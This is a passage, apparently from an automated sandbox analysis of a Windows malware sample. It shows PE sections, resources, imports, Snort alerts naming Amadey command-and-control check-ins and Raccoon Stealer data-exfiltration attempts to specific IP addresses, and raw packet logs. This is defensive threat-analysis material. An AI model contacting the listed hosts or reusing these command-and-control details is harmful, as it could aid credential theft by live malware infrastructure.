                                                                                                                                                                                                    .sutolac0x15f0000xd930xe00False0.00697544642857data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .rsrc0x1600000x83b80x8400False0.597034801136data5.83105278509IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                    .reloc0x1690000x46f60x4800False0.348198784722data3.69392005174IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                    Resources

                                                                                                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                    AFX_DIALOG_LAYOUT0x166ce80x2dataDutchNetherlands
                                                                                                                                                                                                    AFX_DIALOG_LAYOUT0x166ce00x2dataDutchNetherlands
                                                                                                                                                                                                    AFX_DIALOG_LAYOUT0x166cf00x2dataDutchNetherlands
                                                                                                                                                                                                    AFX_DIALOG_LAYOUT0x166cf80x2dataDutchNetherlands
                                                                                                                                                                                                    CIDAFICUDUROSOTAROM0x1665c80x6c7ASCII text, with very long lines, with no line terminatorsSpanishColombia
                                                                                                                                                                                                    RT_CURSOR0x166d000x8a8dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"DutchNetherlands
                                                                                                                                                                                                    RT_ICON0x1606e00x6c8dataSpanishColombia
                                                                                                                                                                                                    RT_ICON0x160da80x568GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                                                                                    RT_ICON0x1613100x10a8dataSpanishColombia
                                                                                                                                                                                                    RT_ICON0x1623b80x988dBase III DBT, version number 0, next free block index 40SpanishColombia
                                                                                                                                                                                                    RT_ICON0x162d400x468GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                                                                                    RT_ICON0x1631f80x8a8dataSpanishColombia
                                                                                                                                                                                                    RT_ICON0x163aa00x6c8dataSpanishColombia
                                                                                                                                                                                                    RT_ICON0x1641680x568GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                                                                                    RT_ICON0x1646d00x10a8dataSpanishColombia
                                                                                                                                                                                                    RT_ICON0x1657780x988dataSpanishColombia
                                                                                                                                                                                                    RT_ICON0x1661000x468GLS_BINARY_LSB_FIRSTSpanishColombia
                                                                                                                                                                                                    RT_STRING0x1675c00xe4dataDutchNetherlands
                                                                                                                                                                                                    RT_STRING0x1676a80x3a8dataDutchNetherlands
                                                                                                                                                                                                    RT_STRING0x167a500x6e6dataDutchNetherlands
                                                                                                                                                                                                    RT_STRING0x1681380x1a0dataDutchNetherlands
                                                                                                                                                                                                    RT_STRING0x1682d80xdcdataDutchNetherlands
                                                                                                                                                                                                    RT_ACCELERATOR0x166ca00x10dataDutchNetherlands
                                                                                                                                                                                                    RT_ACCELERATOR0x166c900x10dataDutchNetherlands
                                                                                                                                                                                                    RT_GROUP_CURSOR0x1675a80x14dataDutchNetherlands
                                                                                                                                                                                                    RT_GROUP_ICON0x1631a80x4cdataSpanishColombia
                                                                                                                                                                                                    RT_GROUP_ICON0x1665680x5adataSpanishColombia
                                                                                                                                                                                                    None0x166cc00xadataDutchNetherlands
                                                                                                                                                                                                    None0x166cd00xadataDutchNetherlands
                                                                                                                                                                                                    None0x166cb00xadataDutchNetherlands

                                                                                                                                                                                                    Imports

                                                                                                                                                                                                    DLLImport
                                                                                                                                                                                                    KERNEL32.dllCallNamedPipeW, TerminateProcess, GetExitCodeProcess, GetVersionExW, SetConsoleCP, GetConsoleAliasesLengthW, GetDefaultCommConfigW, FindFirstFileExW, GetDriveTypeW, FreeEnvironmentStringsA, SetProcessPriorityBoost, SetVolumeMountPointW, GetLongPathNameA, CopyFileA, TlsGetValue, SetConsoleCursorInfo, SetComputerNameExA, SystemTimeToTzSpecificLocalTime, FindAtomA, ReleaseSemaphore, GetNamedPipeHandleStateA, CreateMailslotA, BuildCommDCBAndTimeoutsW, VirtualProtect, LoadLibraryA, LocalAlloc, TryEnterCriticalSection, GetCommandLineW, InterlockedDecrement, GetCalendarInfoA, DeleteFileA, CreateActCtxW, CreateRemoteThread, SetSystemTimeAdjustment, GetPriorityClass, WritePrivateProfileStringA, GetProcessHeaps, GetProcessHeap, GlobalUnWire, ReadConsoleOutputCharacterW, GetStartupInfoW, GetDiskFreeSpaceExA, GetCPInfoExA, GetWindowsDirectoryA, GetSystemWow64DirectoryW, GetLastError, WriteProfileSectionW, GetProfileStringA, SetLastError, DeleteVolumeMountPointA, DebugBreak, lstrcmpA, WriteFile, SetConsoleMode, GetVersion, GetSystemWindowsDirectoryW, GlobalFindAtomA, FindCloseChangeNotification, GetTapeParameters, SetMailslotInfo, InterlockedExchange, DefineDosDeviceW, FindVolumeMountPointClose, EndUpdateResourceW, WriteConsoleW, GetSystemTimeAdjustment, WritePrivateProfileSectionA, GetPrivateProfileStructW, GetDriveTypeA, GetFileAttributesExA, MoveFileW, GetVolumePathNameA, GetConsoleMode, HeapUnlock, lstrcmpW, SetDefaultCommConfigW, FindActCtxSectionStringA, ResetEvent, GetThreadContext, MoveFileExW, GetProcAddress, GlobalLock, UnregisterWaitEx, BuildCommDCBA, PeekConsoleInputA, GetBinaryTypeW, CreateSemaphoreW, TransmitCommChar, WaitNamedPipeA, GetPrivateProfileSectionNamesW, FindResourceExW, EnumTimeFormatsW, GetLocalTime, CreateSemaphoreA, FreeEnvironmentStringsW, GetPrivateProfileSectionW, GetOverlappedResult, SetFileShortNameW, lstrcpyA, VerLanguageNameW, SetThreadExecutionState, SetSystemTime, LockFile, VerSetConditionMask, GetConsoleAliasA, FlushConsoleInputBuffer, FreeConsole, GetAtomNameW, GetConsoleAliasExesLengthA, WriteConsoleInputW, TransactNamedPipe, EnumDateFormatsA, SetCommState, FileTimeToLocalFileTime, _lopen, GetConsoleAliasExesLengthW, GetWriteWatch, GetNumberOfConsoleInputEvents, GetModuleHandleW, WriteConsoleOutputCharacterA, HeapFree, OpenMutexW, LocalLock, GetCommMask, SetEndOfFile, FindClose, CreateIoCompletionPort, SetFileApisToANSI, CancelWaitableTimer, GetProcessHandleCount, UnregisterWait, GetProcessVersion, lstrcpynA, GetNamedPipeInfo, GetCompressedFileSizeA, FindNextVolumeMountPointW, GetFullPathNameA, WriteProfileStringA, DeleteAtom, GlobalAddAtomW, TerminateJobObject, QueryDosDeviceW, InitializeCriticalSection, Process32NextW, SetCurrentDirectoryA, GetBinaryTypeA, MoveFileA, RaiseException, HeapValidate, IsBadReadPtr, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, GetModuleHandleA, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, InterlockedIncrement, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, Sleep, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, HeapDestroy, HeapCreate, VirtualFree, GetModuleFileNameA, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, RtlUnwind, InitializeCriticalSectionAndSpinCount, OutputDebugStringA, OutputDebugStringW, LoadLibraryW, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, WideCharToMultiByte, LCMapStringA, LCMapStringW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CloseHandle, CreateFileA

                                                                                                                                                                                                    Possible Origin

                                                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                    DutchNetherlands
                                                                                                                                                                                                    SpanishColombia

                                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                                    Snort IDS Alerts

                                                                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    01/14/22-04:59:16.383752ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited188.166.28.199192.168.2.3
                                                                                                                                                                                                    01/14/22-04:59:19.384168ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited188.166.28.199192.168.2.3
                                                                                                                                                                                                    01/14/22-04:59:25.384391ICMP486ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited188.166.28.199192.168.2.3
                                                                                                                                                                                                    01/14/22-04:59:46.778391TCP2018581ET TROJAN Single char EXE direct download likely trojan (multiple families)4987380192.168.2.3141.8.194.74
                                                                                                                                                                                                    01/14/22-04:59:46.852816TCP1201ATTACK-RESPONSES 403 Forbidden8049873141.8.194.74192.168.2.3
                                                                                                                                                                                                    01/14/22-04:59:48.529075TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.529105TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.529276TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.529300TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.529644TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.529842TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.530375TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.530542TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.532410TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.533415TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.533658TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.533828TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.534561TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.535426TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.536529TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.536573TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.537508TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.538930TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.541445TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.541496TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.547617TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.548457TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.549777TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.550542TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.550922TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.551006TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.554806TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.557416TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.557674TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.558083TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.562258TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.562880TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.567846TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.569075TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.570644TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.570761TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.574212TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.575938TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.575977TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.576253TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.576635TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.581827TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.583536TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.589689TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.590834TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.592754TCP1087WEB-MISC whisker tab splice attack4987780192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:48.532539TCP2027700ET TROJAN Amadey CnC Check-In4987880192.168.2.3185.215.113.35
                                                                                                                                                                                                    01/14/22-04:59:58.287383TCP2033973ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download)4989780192.168.2.3185.163.204.24
                                                                                                                                                                                                    01/14/22-04:59:58.987539TCP2018581ET TROJAN Single char EXE direct download likely trojan (multiple families)4987380192.168.2.3141.8.194.74
                                                                                                                                                                                                    01/14/22-04:59:59.062297TCP1201ATTACK-RESPONSES 403 Forbidden8049873141.8.194.74192.168.2.3
                                                                                                                                                                                                    01/14/22-04:59:59.964384TCP2033973ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download)4989780192.168.2.3185.163.204.24
                                                                                                                                                                                                    01/14/22-05:00:14.624582TCP2033973ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download)4991380192.168.2.3185.163.204.24
                                                                                                                                                                                                    01/14/22-05:00:15.669639TCP2033973ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download)4991380192.168.2.3185.163.204.24
                                                                                                                                                                                                    01/14/22-05:00:16.798518TCP2033974ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt4991380192.168.2.3185.163.204.24
                                                                                                                                                                                                    01/14/22-05:00:03.120682TCP2033974ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt4989780192.168.2.3185.163.204.24

                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.253190994 CET4974780192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.309535027 CET804974794.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.312138081 CET4974780192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.312180042 CET4974780192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.312189102 CET4974780192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.368520021 CET804974794.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.394426107 CET804974794.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.394520044 CET4974780192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.406805038 CET4974780192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.443093061 CET4974880192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.462987900 CET804974794.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.498769999 CET804974894.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.498899937 CET4974880192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.499056101 CET4974880192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.499113083 CET4974880192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.556288958 CET804974894.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.584256887 CET804974894.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.585448027 CET4974880192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.585673094 CET4974880192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.642103910 CET804974894.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.887898922 CET4974980192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.944154024 CET804974994.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.944328070 CET4974980192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.944475889 CET4974980192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.944494963 CET4974980192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.000679016 CET804974994.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.026256084 CET804974994.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.028253078 CET4974980192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.028846025 CET4974980192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.086050987 CET804974994.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.337712049 CET4975080192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.394073963 CET804975094.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.394779921 CET4975080192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.394917965 CET4975080192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.394942045 CET4975080192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.451255083 CET804975094.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.475620985 CET804975094.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.475752115 CET4975080192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.476212978 CET4975080192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.532350063 CET804975094.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.809200048 CET4975180192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.866080999 CET804975194.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.866218090 CET4975180192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.866328955 CET4975180192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.866344929 CET4975180192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.922744036 CET804975194.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.949268103 CET804975194.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.949402094 CET4975180192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.949651957 CET4975180192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:00.006591082 CET804975194.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:00.297250986 CET4975280192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:00.353822947 CET804975294.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:00.354012966 CET4975280192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:00.354100943 CET4975280192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:00.354115009 CET4975280192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:00.411463022 CET804975294.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:00.435992002 CET804975294.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:00.436140060 CET4975280192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:00.436355114 CET4975280192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:00.444367886 CET4975380192.168.2.3185.186.142.166
                                                                                                                                                                                                    Jan 14, 2022 04:59:00.495400906 CET804975294.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:00.500977039 CET8049753185.186.142.166192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.012696028 CET4975380192.168.2.3185.186.142.166
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.069037914 CET8049753185.186.142.166192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.575228930 CET4975380192.168.2.3185.186.142.166
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.633177042 CET8049753185.186.142.166192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.675354958 CET4975480192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.731887102 CET804975494.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.734277964 CET4975480192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.734334946 CET4975480192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.734376907 CET4975480192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.790740013 CET804975494.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.814809084 CET804975494.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.814855099 CET804975494.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.814946890 CET4975480192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.815182924 CET4975480192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.843807936 CET4975580192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.871540070 CET804975494.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.900377989 CET804975594.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.901501894 CET4975580192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.901595116 CET4975580192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.904372931 CET4975580192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.958621979 CET804975594.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.962941885 CET804975594.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.991240025 CET804975594.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.991380930 CET4975580192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.991779089 CET4975580192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:02.049721003 CET804975594.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:02.289598942 CET4975680192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:02.346148014 CET804975694.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:02.346317053 CET4975680192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:02.346384048 CET4975680192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:02.410214901 CET804975694.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:02.410270929 CET804975694.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:02.410309076 CET804975694.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:02.410346985 CET804975694.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:02.410386086 CET804975694.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:02.410387993 CET4975680192.168.2.394.142.143.91
                                                                                                                                                                                                    Jan 14, 2022 04:59:02.410425901 CET804975694.142.143.91192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:02.410429001 CET4975680192.168.2.394.142.143.91

                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Jan 14, 2022 04:58:57.936820030 CET5787553192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.250190973 CET53578758.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.421669006 CET5415453192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.442079067 CET53541548.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.599421024 CET5280653192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:58:58.886639118 CET53528068.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.036449909 CET5391053192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.337162971 CET53539108.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.492367029 CET6402153192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.808490038 CET53640218.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:58:59.987896919 CET6078453192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:00.296633005 CET53607848.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.657037973 CET5114353192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.674735069 CET53511438.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.822875977 CET5600953192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:01.842137098 CET53560098.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:02.000912905 CET5902653192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:02.288902044 CET53590268.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:04.080883026 CET4957253192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:04.100373983 CET53495728.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:04.270278931 CET6082353192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:04.289714098 CET53608238.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:04.438930035 CET5213053192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:04.458097935 CET53521308.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:04.772653103 CET5510253192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:05.100713968 CET53551028.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:05.322487116 CET5623653192.168.2.38.8.8.8
                                                                                                                                                                                                    Jan 14, 2022 04:59:05.676515102 CET53562368.8.8.8192.168.2.3
                                                                                                                                                                                                    Jan 14, 2022 04:59:05.836077929 CET5652753192.168.2.38.8.8.8
